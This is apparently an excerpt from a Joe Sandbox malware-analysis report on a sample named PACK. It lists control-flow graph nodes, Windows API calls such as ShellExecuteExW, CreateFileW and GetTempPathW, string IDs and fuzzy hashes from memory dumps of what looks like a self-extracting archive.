2ed9dc 584->588 589 2ed4e8 584->589 585->569 588->569 589->588 595->596 597 2ed5d9-2ed5e0 596->597 598 2ed5ec-2ed5ed 597->598 599 2ed5e2-2ed5e6 597->599 598->597 599->569 599->598
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 002ECFD9
                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 002ECFFA
                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 002ED015
                                                                                                                                              • __fprintf_l.LIBCMT ref: 002ED4FB
                                                                                                                                                • Part of subcall function 002F0FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,002EB312,00000000,?,?,?,000104A4), ref: 002F0FFA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                                                                              • String ID: $ ,$$%s:$(&1$*messages***$*messages***$8&1$@%s:$H&1$R$RTL$T&1$a
                                                                                                                                              • API String ID: 4184910265-534355219
                                                                                                                                              • Opcode ID: a73575b7e16ac452b450622f2527d4b3dd4f45a32c1625ca2ef41d38fa4eeb79
                                                                                                                                              • Instruction ID: 75e34b2326a9dd0c911a288d5427c5c88eea41984f71c4565607b8406b70a803
                                                                                                                                              • Opcode Fuzzy Hash: a73575b7e16ac452b450622f2527d4b3dd4f45a32c1625ca2ef41d38fa4eeb79
                                                                                                                                              • Instruction Fuzzy Hash: EE12E1716903899BDF25EFA5CC45AEE37A9FF04300F90016AF9099B291EB71D9A1CF50

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 002FA388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002FA399
                                                                                                                                                • Part of subcall function 002FA388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002FA3AA
                                                                                                                                                • Part of subcall function 002FA388: IsDialogMessageW.USER32(000104A4,?), ref: 002FA3BE
                                                                                                                                                • Part of subcall function 002FA388: TranslateMessage.USER32(?), ref: 002FA3CC
                                                                                                                                                • Part of subcall function 002FA388: DispatchMessageW.USER32(?), ref: 002FA3D6
                                                                                                                                              • GetDlgItem.USER32(00000068,0033DE38), ref: 002FC1A4
                                                                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,002F9D8F), ref: 002FC1CF
                                                                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 002FC1DE
                                                                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,003122E4), ref: 002FC1E8
                                                                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 002FC1FE
                                                                                                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 002FC214
                                                                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 002FC254
                                                                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 002FC25E
                                                                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 002FC26D
                                                                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 002FC290
                                                                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,0031304C), ref: 002FC29B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                              • String ID: \
                                                                                                                                              • API String ID: 3569833718-2967466578
                                                                                                                                              • Opcode ID: fe53775577cc9f55c291d32b4d7a0a3799b6545b99abfba0fceaadafd4ea38c3
                                                                                                                                              • Instruction ID: d2829a8f107ef9a0959be03aa77990d55b0e40e64c6dd5e5ea6a9f2b9ab4e159
                                                                                                                                              • Opcode Fuzzy Hash: fe53775577cc9f55c291d32b4d7a0a3799b6545b99abfba0fceaadafd4ea38c3
                                                                                                                                              • Instruction Fuzzy Hash: 052146712493083BE312EF248C41FAFBBDCEF86754F100618FA90961D1C7A55A0A8AB7

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 611 2fc431-2fc449 call 2fd940 614 2fc44f-2fc45b call 302b33 611->614 615 2fc695-2fc69d 611->615 614->615 618 2fc461-2fc489 call 2fe920 614->618 621 2fc48b 618->621 622 2fc493-2fc4a0 618->622 621->622 623 2fc4a4-2fc4ad 622->623 624 2fc4a2 622->624 625 2fc4af-2fc4b1 623->625 626 2fc4e5 623->626 624->623 627 2fc4b9-2fc4bc 625->627 628 2fc4e9-2fc4eb 626->628 629 2fc649-2fc64e 627->629 630 2fc4c2-2fc4ca 627->630 631 2fc4ed-2fc4f0 628->631 632 2fc4f2-2fc4f4 628->632 633 2fc643-2fc647 629->633 634 2fc650 629->634 635 2fc662-2fc66a 630->635 636 2fc4d0-2fc4d6 630->636 631->632 637 2fc507-2fc519 call 2eb153 631->637 632->637 638 2fc4f6-2fc4fd 632->638 633->629 641 2fc655-2fc659 633->641 634->641 643 2fc66c-2fc66e 635->643 644 2fc672-2fc67a 635->644 636->635 642 2fc4dc-2fc4e3 636->642 646 2fc51b-2fc528 call 2f1410 637->646 647 2fc532-2fc53d call 2e9e6b 637->647 638->637 639 2fc4ff 638->639 639->637 641->635 642->626 642->627 643->644 644->628 646->647 652 2fc52a 646->652 653 2fc53f-2fc556 call 2eaed7 647->653 654 2fc55a-2fc567 ShellExecuteExW 647->654 652->647 653->654 656 2fc56d-2fc580 654->656 657 2fc693-2fc694 654->657 658 2fc593-2fc595 656->658 659 2fc582-2fc589 656->659 657->615 662 2fc5a8-2fc5c7 WaitForInputIdle call 2fc8f0 658->662 663 2fc597-2fc5a0 IsWindowVisible 658->663 659->658 661 2fc58b-2fc591 659->661 661->658 664 2fc5fe-2fc60a CloseHandle 661->664 662->664 672 2fc5c9-2fc5d1 662->672 663->662 665 2fc5a2-2fc5a6 ShowWindow 663->665 668 2fc60c-2fc619 call 2f1410 664->668 669 2fc61b-2fc629 664->669 665->662 668->669 679 2fc67f 668->679 670 2fc62b-2fc62d 669->670 671 2fc686-2fc688 669->671 670->671 676 2fc62f-2fc635 670->676 671->657 674 2fc68a-2fc68c 671->674 672->664 677 2fc5d3-2fc5e4 GetExitCodeProcess 672->677 674->657 678 2fc68e-2fc691 ShowWindow 674->678 676->671 680 2fc637-2fc641 676->680 677->664 681 2fc5e6-2fc5f0 677->681 678->657 679->671 680->671 682 2fc5f7 681->682 683 2fc5f2 681->683 682->664 683->682
                                                                                                                                              APIs
                                                                                                                                              • ShellExecuteExW.SHELL32(000001C0), ref: 002FC55F
                                                                                                                                              • IsWindowVisible.USER32(?), ref: 002FC598
                                                                                                                                              • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 002FC5A4
                                                                                                                                              • WaitForInputIdle.USER32(?,000007D0), ref: 002FC5B1
                                                                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 002FC5DC
                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 002FC602
                                                                                                                                              • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 002FC691
                                                                                                                                                • Part of subcall function 002F1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,002EACFE,?,?,?,002EACAD,?,-00000002,?,00000000,?), ref: 002F1426
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Show$CloseCodeCompareExecuteExitHandleIdleInputProcessShellStringVisibleWait
                                                                                                                                              • String ID: $.exe$.inf
                                                                                                                                              • API String ID: 1693144567-2452507128
                                                                                                                                              • Opcode ID: a0c7593521739462d13062572ac087d7875eca9614ba3ec3723f61390e2bcb95
                                                                                                                                              • Instruction ID: 1ca8eada7dafd25f10a11728a7b48239fea71183dc658dd9362a97d4dcd7c0b5
                                                                                                                                              • Opcode Fuzzy Hash: a0c7593521739462d13062572ac087d7875eca9614ba3ec3723f61390e2bcb95
                                                                                                                                              • Instruction Fuzzy Hash: B751F97042838E9AD7329F20DA50ABBF7ECAFC5384F64083DE6C1A7151D7B19964CB52

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 684 3095a5-3095be 685 3095c0-3095d0 call 30dbbc 684->685 686 3095d4-3095d9 684->686 685->686 693 3095d2 685->693 688 3095e6-30960a MultiByteToWideChar 686->688 689 3095db-3095e3 686->689 691 309610-30961c 688->691 692 30979d-3097b0 call 2fe203 688->692 689->688 694 309670 691->694 695 30961e-30962f 691->695 693->686 697 309672-309674 694->697 698 309631-309640 call 310ee0 695->698 699 30964e-30965f call 307a8a 695->699 701 309792 697->701 702 30967a-30968d MultiByteToWideChar 697->702 698->701 711 309646-30964c 698->711 699->701 712 309665 699->712 706 309794-30979b call 30980d 701->706 702->701 705 309693-3096a5 call 309c64 702->705 714 3096aa-3096ae 705->714 706->692 713 30966b-30966e 711->713 712->713 713->697 714->701 716 3096b4-3096bb 714->716 717 3096f5-309701 716->717 718 3096bd-3096c2 716->718 720 309703-309714 717->720 721 30974d 717->721 718->706 719 3096c8-3096ca 718->719 719->701 724 3096d0-3096ea call 309c64 719->724 722 309716-309725 call 310ee0 720->722 723 30972f-309740 call 307a8a 720->723 725 30974f-309751 721->725 730 30978b-309791 call 30980d 722->730 736 309727-30972d 722->736 723->730 738 309742 723->738 724->706 739 3096f0 724->739 729 309753-30976c call 309c64 725->729 725->730 729->730 742 30976e-309775 729->742 730->701 741 309748-30974b 736->741 738->741 739->701 741->725 743 3097b1-3097b7 742->743 744 309777-309778 742->744 745 309779-309789 WideCharToMultiByte 743->745 744->745 745->730 746 3097b9-3097c0 call 30980d 745->746 746->706
                                                                                                                                              APIs
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0030451B,0030451B,?,?,?,003097F6,00000001,00000001,31E85006), ref: 003095FF
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,003097F6,00000001,00000001,31E85006,?,?,?), ref: 00309685
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,31E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0030977F
                                                                                                                                              • __freea.LIBCMT ref: 0030978C
                                                                                                                                                • Part of subcall function 00307A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00302FA6,?,0000015D,?,?,?,?,00304482,000000FF,00000000,?,?), ref: 00307ABC
                                                                                                                                              • __freea.LIBCMT ref: 00309795
                                                                                                                                              • __freea.LIBCMT ref: 003097BA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                              • String ID: S#~>
                                                                                                                                              • API String ID: 1414292761-2989149754
                                                                                                                                              • Opcode ID: 8a403297aa16593fdd6282a6905afbef7bbe7a2756121589ccf1d329cbfd0102
                                                                                                                                              • Instruction ID: df11a0c870b5550491a6d5f943a3b9cb22c86cb90313d5f09ade004d905cc441
                                                                                                                                              • Opcode Fuzzy Hash: 8a403297aa16593fdd6282a6905afbef7bbe7a2756121589ccf1d329cbfd0102
                                                                                                                                              • Instruction Fuzzy Hash: 0D51F673612216ABDB278E60CCA1FAB77ADEB44B50F16462AFD04D61D2EB34DC40C690

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 749 2fbb5b-2fbb5e 750 2fbcdf-2fbce2 749->750 751 2fbb64-2fbb89 GetTempPathW call 2eaea5 749->751 753 2fbce8-2fbcef 750->753 754 2fc093-2fc0be call 2fa156 750->754 759 2fbb8d-2fbbb9 call 2e3e41 call 2e9e6b 751->759 756 2fbcfb-2fbd02 753->756 757 2fbcf1 753->757 762 2fb51b-2fb529 754->762 763 2fc0c4-2fc0d4 754->763 756->754 757->756 772 2fbb8b-2fbb8c 759->772 773 2fbbbb-2fbbd3 SetDlgItemTextW 759->773 766 2fb52a-2fb53a call 2f9e24 762->766 771 2fb53c 766->771 774 2fb53e-2fb553 call 2f1410 771->774 772->759 773->754 775 2fbbd9-2fbbe0 773->775 780 2fb555-2fb559 774->780 781 2fb560-2fb563 774->781 775->754 777 2fbbe6-2fbc01 call 300bb8 775->777 785 2fbc55-2fbc5d 777->785 786 2fbc03-2fbc0e 777->786 780->774 783 2fb55b 780->783 781->754 784 2fb569 781->784 783->754 789 2fb75f-2fb761 784->789 790 2fb81d-2fb81f 784->790 791 2fb570-2fb573 784->791 792 2fb800-2fb802 784->792 787 2fbc8f-2fbcbf call 2f9c4f call 2f9735 785->787 788 2fbc5f-2fbc8a call 2efab1 * 2 785->788 786->785 793 2fbc10-2fbc12 786->793 787->754 829 2fbcc5-2fbcd9 EndDialog 787->829 788->787 789->754 800 2fb767-2fb773 789->800 790->754 797 2fb825-2fb82c 790->797 791->754 798 2fb579-2fb5e6 call 2f95f8 call 2eb625 call 2ea188 call 2ea2c2 call 2e6ef9 call 2ea215 791->798 792->754 796 2fb808-2fb818 SetWindowTextW 792->796 799 2fbc18-2fbc1c 793->799 796->754 797->754 803 2fb832-2fb84b 797->803 877 2fb5ec-2fb5f2 798->877 878 2fb74b-2fb75a call 2ea19e 798->878 805 2fbc1e-2fbc2d 799->805 806 2fbc31-2fbc4d call 2efab1 799->806 807 2fb787-2fb78c 800->807 808 2fb775-2fb786 call 3066ed 800->808 813 2fb84d 803->813 814 2fb853-2fb861 call 302b33 803->814 805->799 816 2fbc2f 805->816 806->785 809 2fb78e-2fb794 807->809 810 2fb796-2fb7a1 call 2fa2ae 807->810 808->807 819 2fb7a6-2fb7a8 809->819 810->819 813->814 814->754 832 2fb867-2fb870 814->832 816->785 827 2fb7aa-2fb7b1 call 302b33 819->827 828 2fb7b3-2fb7d3 call 302b33 call 302b5e 819->828 827->828 855 2fb7ec-2fb7ee 828->855 856 2fb7d5-2fb7dc 828->856 829->750 837 2fb899-2fb89c 832->837 838 2fb872-2fb876 832->838 843 2fb8a2-2fb8a5 837->843 844 2fb981-2fb98f call 2efab1 837->844 838->837 842 2fb878-2fb880 838->842 842->754 848 2fb886-2fb894 call 2efab1 842->848 849 2fb8a7-2fb8ac 843->849 850 2fb8b2-2fb8cd 843->850 858 2fb991-2fb9a5 call 300d9b 844->858 848->858 849->844 849->850 868 2fb8cf-2fb909 850->868 869 2fb917-2fb91e 850->869 855->754 859 2fb7f4-2fb7fb call 302b4e 855->859 862 2fb7de-2fb7e0 856->862 863 2fb7e3-2fb7eb call 3066ed 856->863 879 2fb9a7-2fb9ab 858->879 880 2fb9b2-2fba0e call 2efab1 call 2f9ffc GetDlgItem SetWindowTextW SendMessageW call 302b69 858->880 859->754 862->863 863->855 896 2fb90d-2fb90f 868->896 897 2fb90b 868->897 871 2fb94c-2fb96f call 302b33 * 2 869->871 872 2fb920-2fb938 call 302b33 869->872 871->858 908 2fb971-2fb97f call 2efa89 871->908 872->871 890 2fb93a-2fb947 call 2efa89 872->890 884 2fb5f9-2fb60e SetFileAttributesW 877->884 878->754 879->880 885 2fb9ad-2fb9af 879->885 880->754 919 2fba14-2fba26 SendMessageW 880->919 891 2fb6b4-2fb6c0 GetFileAttributesW 884->891 892 2fb614-2fb647 call 2eb1b7 call 2eaea5 call 302b33 884->892 885->880 890->871 901 2fb6c2-2fb6d1 DeleteFileW 891->901 902 2fb730-2fb745 call 2ea215 891->902 925 2fb65a-2fb668 call 2eb5e5 892->925 926 2fb649-2fb658 call 302b33 892->926 896->869 897->896 901->902 907 2fb6d3-2fb6d6 901->907 902->878 916 2fb5f4 902->916 912 2fb6da-2fb706 call 2e3e41 GetFileAttributesW 907->912 908->858 923 2fb6d8-2fb6d9 912->923 924 2fb708-2fb71e MoveFileW 912->924 916->884 919->754 923->912 924->902 927 2fb720-2fb72a MoveFileExW 924->927 925->878 932 2fb66e-2fb6ae call 302b33 call 2fe920 SHFileOperationW 925->932 926->925 926->932 927->902 932->891
                                                                                                                                              APIs
                                                                                                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 002FBB71
                                                                                                                                              • _swprintf.LIBCMT ref: 002FBBA5
                                                                                                                                                • Part of subcall function 002E3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002E3E54
                                                                                                                                              • SetDlgItemTextW.USER32(?,00000066,003285FA), ref: 002FBBC5
                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 002FBBF8
                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 002FBCD9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                                                                                                              • String ID: %s%s%u
                                                                                                                                              • API String ID: 2892007947-1360425832
                                                                                                                                              • Opcode ID: 1fa95587f2e275146a031f707f17ef4c9d30571d77bd53f2f1a94f3756771b98
                                                                                                                                              • Instruction ID: 80bde9463ea289b25462c02200278b7e5325d9b2485556cc0c04c46dd5b2a945
                                                                                                                                              • Opcode Fuzzy Hash: 1fa95587f2e275146a031f707f17ef4c9d30571d77bd53f2f1a94f3756771b98
                                                                                                                                              • Instruction Fuzzy Hash: 44419D7191021EAEEF26DF60CD84FEEB7BCAB19344F1040B6E609E6150EF708A948F50

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 937 2f9a32-2f9a51 GetClassNameW 938 2f9a79-2f9a7b 937->938 939 2f9a53-2f9a68 call 2f1410 937->939 940 2f9a7d-2f9a7f 938->940 941 2f9a86-2f9a8a 938->941 944 2f9a6a-2f9a76 FindWindowExW 939->944 945 2f9a78 939->945 940->941 944->945 945->938
                                                                                                                                              APIs
                                                                                                                                              • GetClassNameW.USER32(?,?,00000050), ref: 002F9A49
                                                                                                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 002F9A80
                                                                                                                                                • Part of subcall function 002F1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,002EACFE,?,?,?,002EACAD,?,-00000002,?,00000000,?), ref: 002F1426
                                                                                                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 002F9A70
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                              • String ID: @Uxu$EDIT
                                                                                                                                              • API String ID: 4243998846-59804995
                                                                                                                                              • Opcode ID: 0d5b35aaa923685322d5ac50281fce5e21eecd7c9ba3b8f0c3f4736a37985c11
                                                                                                                                              • Instruction ID: 38914b90b622dbff30146750cc27b175a0e2d628e95fa58bdd6107843b8c667a
                                                                                                                                              • Opcode Fuzzy Hash: 0d5b35aaa923685322d5ac50281fce5e21eecd7c9ba3b8f0c3f4736a37985c11
                                                                                                                                              • Instruction Fuzzy Hash: BFF0E232A1022C77E7319A649C05FFBB76C9B8AB80F440166BF01F30C0D7609A5286F6

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 946 2ee7e3-2ee7ea 947 2ee81f-2ee820 946->947 948 2ee7ec-2ee7fa call 2efcfd 946->948 951 2ee7fc-2ee818 GetProcAddress * 2 948->951 952 2ee81b 948->952 951->952 952->947
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 002EFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002EFD18
                                                                                                                                                • Part of subcall function 002EFCFD: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,002EE7F6,Crypt32.dll,?,002EE878,?,002EE85C,?,?,?,?), ref: 002EFD3A
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 002EE802
                                                                                                                                              • GetProcAddress.KERNEL32(00327350,CryptUnprotectMemory), ref: 002EE812
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                                              • API String ID: 2141747552-1753850145
                                                                                                                                              • Opcode ID: 03b6e26e2b86bd6043dc5ae17c68ed37f505d1f07dab003e831e685604d31979
                                                                                                                                              • Instruction ID: d373c062c235919c746b2d8581a413f690c43ca7cfaeb3c3b7c2d5602b82e79a
                                                                                                                                              • Opcode Fuzzy Hash: 03b6e26e2b86bd6043dc5ae17c68ed37f505d1f07dab003e831e685604d31979
                                                                                                                                              • Instruction Fuzzy Hash: 45E04FB0950683AACB069F369808682FBA46F18700F10C126E414D31A5DBF4D0B0CB60

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 953 2e9768-2e9789 call 2fd940 956 2e978b-2e978e 953->956 957 2e9794 953->957 956->957 958 2e9790-2e9792 956->958 959 2e9796-2e97b3 957->959 958->959 960 2e97bb-2e97c5 959->960 961 2e97b5 959->961 962 2e97ca-2e97e9 call 2e6ef9 960->962 963 2e97c7 960->963 961->960 966 2e97eb 962->966 967 2e97f1-2e980f CreateFileW 962->967 963->962 966->967 968 2e9873-2e9878 967->968 969 2e9811-2e9833 GetLastError call 2eb32c 967->969 971 2e987a-2e987d 968->971 972 2e9899-2e98ad 968->972 977 2e9835-2e9857 CreateFileW GetLastError 969->977 978 2e9862-2e9867 969->978 971->972 974 2e987f-2e9893 SetFileTime 971->974 975 2e98af-2e98c2 call 2efab1 972->975 976 2e98c7-2e98d2 972->976 974->972 975->976 980 2e985d-2e9860 977->980 981 2e9859 977->981 978->968 982 2e9869 978->982 980->968 980->978 981->980 982->968
                                                                                                                                              APIs
                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,002E76F2,?,00000005,?,00000011), ref: 002E9804
                                                                                                                                              • GetLastError.KERNEL32(?,?,002E76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002E9811
                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,00000800,?,?,002E76F2,?,00000005,?), ref: 002E9846
                                                                                                                                              • GetLastError.KERNEL32(?,?,002E76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002E984E
